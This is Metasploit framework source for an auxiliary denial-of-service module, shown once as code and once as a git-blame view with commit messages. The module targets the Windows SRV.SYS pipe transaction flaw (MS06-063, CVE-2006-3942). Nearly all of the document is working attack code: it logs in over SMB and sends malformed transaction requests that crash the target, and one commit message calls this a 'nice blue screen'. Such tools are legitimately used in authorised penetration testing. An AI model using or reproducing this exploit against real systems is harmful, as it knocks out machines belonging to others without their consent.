metasploit-framework/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb

require 'msf/core'

module Msf

class Auxiliary::Dos::Windows::Smb::TRANS_PIPE_NONULL < Msf::Auxiliary

	include Auxiliary::Dos
	include Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft SRV.SYS Pipe Transaction No Null',
			'Description'    => %q{
				This module exploits a NULL pointer dereference flaw in the
			SRV.SYS driver of the Windows operating system. This bug was
			independently discovered by CORE Security and ISS.
			},
			
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 3666 $',
			'References'     =>
				[
					['MSB', 'MS06-063' ],
					['CVE', '2006-3942'],
					['BID', '19215'],
				]
		))
		
	end

	def run

		print_status("Connecting to the target system...");

		connect
		smb_login

		begin
			1.upto(5) do |i|
				print_status("Sending bad SMB transaction request #{i.to_s}...");
				self.simple.client.trans_nonull(
					"\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}", 
					'', 
					Rex::Text.rand_text_alphanumeric(rand(16)+1), 
					3, 
					[1,0,1].pack('vvv'), 
					true
				)
			end
		rescue ::Interrupt
			return

		rescue ::Exception => e
			print_status("Error: #{e.class.to_s} > #{e.to_s}")
		end


		disconnect
	end

end
end
Trigger a nice blue screen :-) git-svn-id: file:///home/svn/framework3/trunk@3886 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-14 05:42:20 +00:00			`require 'msf/core'`

			`module Msf`

			`class Auxiliary::Dos::Windows::Smb::TRANS_PIPE_NONULL < Msf::Auxiliary`

			`include Auxiliary::Dos`
			`include Exploit::Remote::SMB`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null',`
			`'Description' => %q{`
			`This module exploits a NULL pointer dereference flaw in the`
			`SRV.SYS driver of the Windows operating system. This bug was`
			`independently discovered by CORE Security and ISS.`
			`},`

			`'Author' => [ 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision: 3666 $',`
			`'References' =>`
			`[`
Updated to reflect the MSB name git-svn-id: file:///home/svn/framework3/trunk@4015 4d416f70-5f16-0410-b530-b9f4589650da 2006-10-10 18:08:23 +00:00			`['MSB', 'MS06-063' ],`
Trigger a nice blue screen :-) git-svn-id: file:///home/svn/framework3/trunk@3886 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-14 05:42:20 +00:00			`['CVE', '2006-3942'],`
			`['BID', '19215'],`
			`]`
			`))`

			`end`

			`def run`

Minor cosmetic changes git-svn-id: file:///home/svn/framework3/trunk@3887 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-14 05:51:15 +00:00			`print_status("Connecting to the target system...");`
Trigger a nice blue screen :-) git-svn-id: file:///home/svn/framework3/trunk@3886 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-14 05:42:20 +00:00
			`connect`
			`smb_login`

			`begin`
Minor cosmetic changes git-svn-id: file:///home/svn/framework3/trunk@3887 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-14 05:51:15 +00:00			`1.upto(5) do \|i\|`
			`print_status("Sending bad SMB transaction request #{i.to_s}...");`
			`self.simple.client.trans_nonull(`
			`"\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",`
			`'',`
			`Rex::Text.rand_text_alphanumeric(rand(16)+1),`
			`3,`
			`[1,0,1].pack('vvv'),`
			`true`
			`)`
			`end`
Trigger a nice blue screen :-) git-svn-id: file:///home/svn/framework3/trunk@3886 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-14 05:42:20 +00:00			`rescue ::Interrupt`
			`return`

			`rescue ::Exception => e`
			`print_status("Error: #{e.class.to_s} > #{e.to_s}")`
			`end`


			`disconnect`
			`end`

			`end`
			`end`